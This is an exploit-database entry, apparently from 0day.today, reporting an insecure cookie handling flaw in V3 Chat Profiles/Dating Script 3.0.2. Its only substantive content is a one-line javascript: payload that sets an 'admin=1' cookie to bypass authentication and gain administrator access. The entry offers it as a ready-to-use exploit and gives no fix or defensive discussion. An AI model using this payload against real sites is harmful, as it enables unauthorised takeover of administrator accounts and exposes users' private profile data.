id: 4131
date: 11/08/2008
title: V3 Chat - Profiles/Dating Script 3.0.2 Insecure Cookie Handling Vuln
author: Stack
cves: 

====================================================================
V3 Chat - Profiles/Dating Script 3.0.2 Insecure Cookie Handling Vuln
====================================================================


###############################################################################################
[+] V3 Chat - Profiles/Dating Script v3.0.2 Insecure Cookie Handling Vulnerability
[+] Discovered By : Mountassif Moad         
[+] Greetz : All my freind         
################################################################################################
Exploit:
javascript:document.cookie = "admin=1; path=/";



#  0day.today [2023-03-27]  #